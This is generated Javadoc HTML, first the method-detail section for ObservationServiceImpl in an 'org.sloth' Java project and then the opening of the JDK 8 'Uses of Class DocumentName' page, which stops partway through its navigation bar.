HREF="../../../../org/sloth/service/ObservationService.html#getCategories()">ObservationService</A></CODE></B></DD> <DD>Returns all <code>Categorie</code>s known by the system. If no <code>Categorie</code> is known an empty <code>Collection</code> will be returned. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getCategories()">getCategories</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Returns:</B><DD>all <code>Categorie</code>s</DL> </DD> </DL> <HR> <A NAME="getNewestObservations(int)"><!-- --></A><H3> getNewestObservations</H3> <PRE> public java.util.List&lt;<A HREF="../../../../org/sloth/model/Observation.html" title="class in org.sloth.model">Observation</A>&gt; <B>getNewestObservations</B>(int&nbsp;u)</PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getNewestObservations(int)">ObservationService</A></CODE></B></DD> <DD>Returns the last created <code>Observation</code>s. Newest first. If there are less <code>Obseravtion</code>s than <code>u</code> all <code>Observation</code>s are returned. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getNewestObservations(int)">getNewestObservations</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>u</CODE> - speciefies how many <code>Observation</code>s will be returned. <DT><B>Returns:</B><DD><code>u</code> or less <code>Observation</code>s. Newest first.</DL> </DD> </DL> <HR> <A NAME="getObservation(java.lang.Long)"><!-- --></A><H3> getObservation</H3> <PRE> public <A HREF="../../../../org/sloth/model/Observation.html" title="class in org.sloth.model">Observation</A> <B>getObservation</B>(java.lang.Long&nbsp;id) throws java.lang.NullPointerException</PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getObservation(java.lang.Long)">ObservationService</A></CODE></B></DD> <DD>Returns the <code>Observation</code> with the specified <code>id</code>. If the system does not an <code>Observation</code> with that id, <code>null</code> is returned. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getObservation(java.lang.Long)">getObservation</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>id</CODE> - the <code>id</code> of the <code>Observation</code> <DT><B>Returns:</B><DD>the <code>Observation</code> or <code>null</code> <DT><B>Throws:</B> <DD><CODE>java.lang.NullPointerException</CODE> - if <code>id</code> is <code>null</code></DL> </DD> </DL> <HR> <A NAME="getObservations()"><!-- --></A><H3> getObservations</H3> <PRE> public java.util.Collection&lt;<A HREF="../../../../org/sloth/model/Observation.html" title="class in org.sloth.model">Observation</A>&gt; <B>getObservations</B>()</PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getObservations()">ObservationService</A></CODE></B></DD> <DD>Returns all <code>Observation</code>s known by the system. If no <code>Observation</code> is known an empty <code>Collection</code> will be returned. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getObservations()">getObservations</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Returns:</B><DD>all <code>Observation</code>s</DL> </DD> </DL> <HR> <A NAME="getObservations(org.sloth.model.Categorie)"><!-- --></A><H3> getObservations</H3> <PRE> public java.util.Collection&lt;<A HREF="../../../../org/sloth/model/Observation.html" title="class in org.sloth.model">Observation</A>&gt; <B>getObservations</B>(<A HREF="../../../../org/sloth/model/Categorie.html" title="class in org.sloth.model">Categorie</A>&nbsp;oc) throws java.lang.NullPointerException, java.lang.IllegalArgumentException</PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getObservations(org.sloth.model.Categorie)">ObservationService</A></CODE></B></DD> <DD>Returns all <code>Observation</code>s in the specified <code>Categorie</code>. The <code>Categorie</code> has to be known by the system and not <code>null</code>. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getObservations(org.sloth.model.Categorie)">getObservations</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>oc</CODE> - the <code>Categorie</code> to query <DT><B>Returns:</B><DD>all <code>Observation</code>s in <code>oc</code> <DT><B>Throws:</B> <DD><CODE>java.lang.NullPointerException</CODE> - if <code>oc</code> is <code>null</code> <DD><CODE>java.lang.IllegalArgumentException</CODE> - if <code>oc</code> is not in the system</DL> </DD> </DL> <HR> <A NAME="getObservations(java.lang.String)"><!-- --></A><H3> getObservations</H3> <PRE> public java.util.Collection&lt;<A HREF="../../../../org/sloth/model/Observation.html" title="class in org.sloth.model">Observation</A>&gt; <B>getObservations</B>(java.lang.String&nbsp;keyword) throws java.lang.NullPointerException</PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getObservations(java.lang.String)">ObservationService</A></CODE></B></DD> <DD>Searches all <code>Observaton</code> titles, descriptions and all <code>Categorie</code> titles and descriptions for the specified keyword. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getObservations(java.lang.String)">getObservations</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>keyword</CODE> - the keyword to search for <DT><B>Returns:</B><DD>all matching <code>Observation</code>s <DT><B>Throws:</B> <DD><CODE>java.lang.NullPointerException</CODE> - if <code>keyword</code> is <code>null</code></DL> </DD> </DL> <HR> <A NAME="getObservationsByUser(org.sloth.model.User)"><!-- --></A><H3> getObservationsByUser</H3> <PRE> public java.util.Collection&lt;<A HREF="../../../../org/sloth/model/Observation.html" title="class in org.sloth.model">Observation</A>&gt; <B>getObservationsByUser</B>(<A HREF="../../../../org/sloth/model/User.html" title="class in org.sloth.model">User</A>&nbsp;u)</PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getObservationsByUser(org.sloth.model.User)">ObservationService</A></CODE></B></DD> <DD>Returns all <code>Observation</code>s created by the the specified <code>User</code>. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getObservationsByUser(org.sloth.model.User)">getObservationsByUser</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>u</CODE> - the <code>User</code> <DT><B>Returns:</B><DD>all <code>Observation</code>s created by <code>u</code></DL> </DD> </DL> <HR> <A NAME="getReport(java.lang.Long)"><!-- --></A><H3> getReport</H3> <PRE> public <A HREF="../../../../org/sloth/model/Report.html" title="class in org.sloth.model">Report</A> <B>getReport</B>(java.lang.Long&nbsp;id) throws java.lang.NullPointerException</PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getReport(java.lang.Long)">ObservationService</A></CODE></B></DD> <DD>Searches for a <code>Report</code> with the specified <code>id</code>. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getReport(java.lang.Long)">getReport</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>id</CODE> - the id <DT><B>Returns:</B><DD>the <code>Report</code> with this <code>id</code> or <code>null</code> if no found <DT><B>Throws:</B> <DD><CODE>java.lang.NullPointerException</CODE> - if <code>id</code> is <code>null</code></DL> </DD> </DL> <HR> <A NAME="getReports()"><!-- --></A><H3> getReports</H3> <PRE> public java.util.Collection&lt;<A HREF="../../../../org/sloth/model/Report.html" title="class in org.sloth.model">Report</A>&gt; <B>getReports</B>()</PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getReports()">ObservationService</A></CODE></B></DD> <DD>Returns all known <code>Report</code>s. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getReports()">getReports</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Returns:</B><DD>all <code>Report</code>s</DL> </DD> </DL> <HR> <A NAME="getReportsByObservation(org.sloth.model.Observation)"><!-- --></A><H3> getReportsByObservation</H3> <PRE> public java.util.Collection&lt;<A HREF="../../../../org/sloth/model/Report.html" title="class in org.sloth.model">Report</A>&gt; <B>getReportsByObservation</B>(<A HREF="../../../../org/sloth/model/Observation.html" title="class in org.sloth.model">Observation</A>&nbsp;o) throws java.lang.NullPointerException, java.lang.IllegalArgumentException</PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getReportsByObservation(org.sloth.model.Observation)">ObservationService</A></CODE></B></DD> <DD>Returns all <code>Report</code>s made for a specified <code>Observation</code>. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getReportsByObservation(org.sloth.model.Observation)">getReportsByObservation</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>o</CODE> - the <code>Observation</code> <DT><B>Returns:</B><DD>all <code>Report</code>s made for <code>o</code> <DT><B>Throws:</B> <DD><CODE>java.lang.NullPointerException</CODE> - if <code>o</code> is <code>null</code> <DD><CODE>java.lang.IllegalArgumentException</CODE> - if <code>o</code> is not known</DL> </DD> </DL> <HR> <A NAME="getReportsByProcessedState(boolean)"><!-- --></A><H3> getReportsByProcessedState</H3> <PRE> public java.util.Collection&lt;<A HREF="../../../../org/sloth/model/Report.html" title="class in org.sloth.model">Report</A>&gt; <B>getReportsByProcessedState</B>(boolean&nbsp;processed)</PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getReportsByProcessedState(boolean)">ObservationService</A></CODE></B></DD> <DD>Returns all <code>Report</code>s with the specified processed-state. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getReportsByProcessedState(boolean)">getReportsByProcessedState</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>processed</CODE> - the state <DT><B>Returns:</B><DD>all <code>Report</code>s with the specified state</DL> </DD> </DL> <HR> <A NAME="getReportsByUser(org.sloth.model.User)"><!-- --></A><H3> getReportsByUser</H3> <PRE> public java.util.Collection&lt;<A HREF="../../../../org/sloth/model/Report.html" title="class in org.sloth.model">Report</A>&gt; <B>getReportsByUser</B>(<A HREF="../../../../org/sloth/model/User.html" title="class in org.sloth.model">User</A>&nbsp;u) throws java.lang.NullPointerException, java.lang.IllegalArgumentException</PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getReportsByUser(org.sloth.model.User)">ObservationService</A></CODE></B></DD> <DD>Returns all <code>Report</code>s created by a <code>User</code>. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#getReportsByUser(org.sloth.model.User)">getReportsByUser</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>u</CODE> - the <code>author</code> <DT><B>Returns:</B><DD>all <code>Report</code>s created by <code>u</code> <DT><B>Throws:</B> <DD><CODE>java.lang.NullPointerException</CODE> - if <code>u</code> is <code>null</code> <DD><CODE>java.lang.IllegalArgumentException</CODE> - if <code>u</code> is not known</DL> </DD> </DL> <HR> <A NAME="isCategorieTitleAvailable(java.lang.String)"><!-- --></A><H3> isCategorieTitleAvailable</H3> <PRE> public boolean <B>isCategorieTitleAvailable</B>(java.lang.String&nbsp;title)</PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#isCategorieTitleAvailable(java.lang.String)">ObservationService</A></CODE></B></DD> <DD>Returns wether the <code>title</code> is available. The <code>Cateogorie</code> <code>title</code> has to be unique. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#isCategorieTitleAvailable(java.lang.String)">isCategorieTitleAvailable</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>title</CODE> - the title. <DT><B>Returns:</B><DD><code>true</code> if available, otherwise <code>false</code></DL> </DD> </DL> <HR> <A NAME="registrate(org.sloth.model.Categorie)"><!-- --></A><H3> registrate</H3> <PRE> public void <B>registrate</B>(<A HREF="../../../../org/sloth/model/Categorie.html" title="class in org.sloth.model">Categorie</A>&nbsp;categorie) throws <A HREF="../../../../org/sloth/exception/ConstraintViolationException.html" title="class in org.sloth.exception">ConstraintViolationException</A>, java.lang.NullPointerException</PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#registrate(org.sloth.model.Categorie)">ObservationService</A></CODE></B></DD> <DD>Adds a <code>Categorie</code> to the system. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#registrate(org.sloth.model.Categorie)">registrate</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>categorie</CODE> - the <code>Categorie</code> <DT><B>Throws:</B> <DD><CODE><A HREF="../../../../org/sloth/exception/ConstraintViolationException.html" title="class in org.sloth.exception">ConstraintViolationException</A></CODE> - if <code>categorie</code> violates a system constraint <DD><CODE>java.lang.NullPointerException</CODE> - if <code>categorie</code> is <code>null</code></DL> </DD> </DL> <HR> <A NAME="registrate(org.sloth.model.Observation)"><!-- --></A><H3> registrate</H3> <PRE> public void <B>registrate</B>(<A HREF="../../../../org/sloth/model/Observation.html" title="class in org.sloth.model">Observation</A>&nbsp;observation) throws java.lang.NullPointerException, <A HREF="../../../../org/sloth/exception/ConstraintViolationException.html" title="class in org.sloth.exception">ConstraintViolationException</A>, java.lang.IllegalArgumentException</PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#registrate(org.sloth.model.Observation)">ObservationService</A></CODE></B></DD> <DD>Adds an <code>Observation</code> to the system. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#registrate(org.sloth.model.Observation)">registrate</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>observation</CODE> - the <code>Observation</code> <DT><B>Throws:</B> <DD><CODE>java.lang.NullPointerException</CODE> - if <code>observation</code> is <code>null</code> <DD><CODE><A HREF="../../../../org/sloth/exception/ConstraintViolationException.html" title="class in org.sloth.exception">ConstraintViolationException</A></CODE> - if <code>observation</code> violates a system constraint <DD><CODE>java.lang.IllegalArgumentException</CODE> - if <code>observation</code> is already known by the system.</DL> </DD> </DL> <HR> <A NAME="registrate(org.sloth.model.Report)"><!-- --></A><H3> registrate</H3> <PRE> public void <B>registrate</B>(<A HREF="../../../../org/sloth/model/Report.html" title="class in org.sloth.model">Report</A>&nbsp;r) throws java.lang.NullPointerException, java.lang.IllegalArgumentException, <A HREF="../../../../org/sloth/exception/ConstraintViolationException.html" title="class in org.sloth.exception">ConstraintViolationException</A></PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#registrate(org.sloth.model.Report)">ObservationService</A></CODE></B></DD> <DD>Registrates a <code>Report</code>. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#registrate(org.sloth.model.Report)">registrate</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>r</CODE> - the <code>Report</code> <DT><B>Throws:</B> <DD><CODE>java.lang.NullPointerException</CODE> - if <code>r</code> is <code>null</code> <DD><CODE>java.lang.IllegalArgumentException</CODE> - if <code>r</code> is already known. <DD><CODE><A HREF="../../../../org/sloth/exception/ConstraintViolationException.html" title="class in org.sloth.exception">ConstraintViolationException</A></CODE> - if <code>r</code> violates any constraint</DL> </DD> </DL> <HR> <A NAME="setCategorieDao(org.sloth.persistence.CategorieDao)"><!-- --></A><H3> setCategorieDao</H3> <PRE> public void <B>setCategorieDao</B>(<A HREF="../../../../org/sloth/persistence/CategorieDao.html" title="interface in org.sloth.persistence">CategorieDao</A>&nbsp;ocDao)</PRE> <DL> <DD><DL> </DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>ocDao</CODE> - the categorieDao to set</DL> </DD> </DL> <HR> <A NAME="setObservationDao(org.sloth.persistence.ObservationDao)"><!-- --></A><H3> setObservationDao</H3> <PRE> public void <B>setObservationDao</B>(<A HREF="../../../../org/sloth/persistence/ObservationDao.html" title="interface in org.sloth.persistence">ObservationDao</A>&nbsp;oDao)</PRE> <DL> <DD><DL> </DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>oDao</CODE> - the observationDao to set</DL> </DD> </DL> <HR> <A NAME="setReportDao(org.sloth.persistence.ReportDao)"><!-- --></A><H3> setReportDao</H3> <PRE> public void <B>setReportDao</B>(<A HREF="../../../../org/sloth/persistence/ReportDao.html" title="interface in org.sloth.persistence">ReportDao</A>&nbsp;rDao)</PRE> <DL> <DD><DL> </DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>rDao</CODE> - the reportDao to set</DL> </DD> </DL> <HR> <A NAME="updateCategorie(org.sloth.model.Categorie)"><!-- --></A><H3> updateCategorie</H3> <PRE> public void <B>updateCategorie</B>(<A HREF="../../../../org/sloth/model/Categorie.html" title="class in org.sloth.model">Categorie</A>&nbsp;categorie) throws java.lang.NullPointerException, <A HREF="../../../../org/sloth/exception/ConstraintViolationException.html" title="class in org.sloth.exception">ConstraintViolationException</A>, java.lang.IllegalArgumentException</PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#updateCategorie(org.sloth.model.Categorie)">ObservationService</A></CODE></B></DD> <DD>Merges changes made to <code>categorie</code> into the system. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#updateCategorie(org.sloth.model.Categorie)">updateCategorie</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>categorie</CODE> - the <code>Categorie</code> <DT><B>Throws:</B> <DD><CODE>java.lang.NullPointerException</CODE> - if <code>categorie</code> is <code>null</code> <DD><CODE><A HREF="../../../../org/sloth/exception/ConstraintViolationException.html" title="class in org.sloth.exception">ConstraintViolationException</A></CODE> - if <code>categorie</code> violates a system constraint <DD><CODE>java.lang.IllegalArgumentException</CODE> - if <code>categorie</code> is not known by the system</DL> </DD> </DL> <HR> <A NAME="updateObservation(org.sloth.model.Observation)"><!-- --></A><H3> updateObservation</H3> <PRE> public void <B>updateObservation</B>(<A HREF="../../../../org/sloth/model/Observation.html" title="class in org.sloth.model">Observation</A>&nbsp;observation) throws java.lang.NullPointerException, <A HREF="../../../../org/sloth/exception/ConstraintViolationException.html" title="class in org.sloth.exception">ConstraintViolationException</A>, java.lang.IllegalArgumentException</PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#updateObservation(org.sloth.model.Observation)">ObservationService</A></CODE></B></DD> <DD>Merges changes made to <code>observation</code> into the system. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#updateObservation(org.sloth.model.Observation)">updateObservation</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>observation</CODE> - the <code>Observation</code> <DT><B>Throws:</B> <DD><CODE>java.lang.NullPointerException</CODE> - if <code>observation</code> is <code>null</code> <DD><CODE><A HREF="../../../../org/sloth/exception/ConstraintViolationException.html" title="class in org.sloth.exception">ConstraintViolationException</A></CODE> - if <code>observation</code> violates a system constraint <DD><CODE>java.lang.IllegalArgumentException</CODE> - if <code>observation</code> is not known by the system</DL> </DD> </DL> <HR> <A NAME="updateReport(org.sloth.model.Report)"><!-- --></A><H3> updateReport</H3> <PRE> public void <B>updateReport</B>(<A HREF="../../../../org/sloth/model/Report.html" title="class in org.sloth.model">Report</A>&nbsp;r) throws java.lang.NullPointerException, java.lang.IllegalArgumentException, <A HREF="../../../../org/sloth/exception/ConstraintViolationException.html" title="class in org.sloth.exception">ConstraintViolationException</A></PRE> <DL> <DD><B>Description copied from interface: <CODE><A HREF="../../../../org/sloth/service/ObservationService.html#updateReport(org.sloth.model.Report)">ObservationService</A></CODE></B></DD> <DD>Persist changes made to an specified <code>Report</code>. <P> <DD><DL> <DT><B>Specified by:</B><DD><CODE><A HREF="../../../../org/sloth/service/ObservationService.html#updateReport(org.sloth.model.Report)">updateReport</A></CODE> in interface <CODE><A HREF="../../../../org/sloth/service/ObservationService.html" title="interface in org.sloth.service">ObservationService</A></CODE></DL> </DD> <DD><DL> <DT><B>Parameters:</B><DD><CODE>r</CODE> - the <code>Report</code> <DT><B>Throws:</B> <DD><CODE>java.lang.NullPointerException</CODE> - if <code>r</code> is <code>null</code> <DD><CODE>java.lang.IllegalArgumentException</CODE> - if <code>r</code> is not known. <DD><CODE><A HREF="../../../../org/sloth/exception/ConstraintViolationException.html" title="class in org.sloth.exception">ConstraintViolationException</A></CODE> - if <code>r</code> violates any constraint</DL> </DD> </DL> <!-- ========= END OF CLASS DATA ========= --> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/ObservationServiceImpl.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../../org/sloth/service/impl/MD5PasswordService.html" title="class in org.sloth.service.impl"><B>PREV CLASS</B></A>&nbsp; &nbsp;<A HREF="../../../../org/sloth/service/impl/UserServiceImpl.html" title="class in org.sloth.service.impl"><B>NEXT CLASS</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../index.html?org/sloth/service/impl/ObservationServiceImpl.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="ObservationServiceImpl.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> <TR> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> SUMMARY:&nbsp;NESTED&nbsp;|&nbsp;FIELD&nbsp;|&nbsp;<A HREF="#constructor_summary">CONSTR</A>&nbsp;|&nbsp;<A HREF="#method_summary">METHOD</A></FONT></TD> <TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2"> DETAIL:&nbsp;FIELD&nbsp;|&nbsp;<A HREF="#constructor_detail">CONSTR</A>&nbsp;|&nbsp;<A HREF="#method_detail">METHOD</A></FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> Copyright &#169; 2010. All Rights Reserved. </BODY> </HTML>
jdk8en_us/docs/api/javax/print/attribute/standard/class-use/DocumentName.html
DeanAaron/jdk8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_11) on Mon Jun 16 17:36:06 PDT 2014 --> <title>Uses of Class javax.print.attribute.standard.DocumentName (Java Platform SE 8 )</title> <meta name="date" content="2014-06-16"> <link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class javax.print.attribute.standard.DocumentName (Java Platform SE 8 )"; } } catch(err) { } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../javax/print/attribute/standard/DocumentName.html" title="class in javax.print.attribute.standard">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-files/index-1.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> <div class="aboutLanguage"><strong>Java&trade;&nbsp;Platform<br>Standard&nbsp;Ed.&nbsp;8</strong></div> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?javax/print/attribute/standard/class-use/DocumentName.html" target="_top">Frames</a></li> <li><a href="DocumentName.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h2 title="Uses of Class javax.print.attribute.standard.DocumentName" class="title">Uses of Class<br>javax.print.attribute.standard.DocumentName</h2> </div> <div class="classUseContainer">No usage of javax.print.attribute.standard.DocumentName</div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a 